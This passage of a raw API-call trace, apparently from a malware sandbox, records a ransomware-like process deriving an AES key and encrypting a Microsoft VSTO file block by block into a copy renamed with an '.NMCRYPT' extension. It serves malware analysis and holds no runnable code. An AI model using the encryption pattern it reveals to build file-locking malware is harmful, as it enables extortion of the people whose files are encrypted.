pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.441] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.441] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0166.441] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.441] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad5b8) returned 1 [0166.441] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.441] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.441] wcslen (_String="\\\\?\\") returned 0x4 [0166.441] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad8b8) returned 1 [0166.441] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.480] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=17048) returned 1 [0166.480] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.481] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.571] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.572] GetLastError () returned 0x0 [0166.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.633] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.633] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.633] GetLastError () returned 0x0 [0166.633] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.634] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.634] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.634] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.634] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.635] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.635] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.635] GetLastError () returned 0x0 [0166.635] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.636] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.636] GetLastError () returned 0x0 [0166.636] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.636] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.637] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.637] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.637] GetLastError () returned 0x0 [0166.637] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 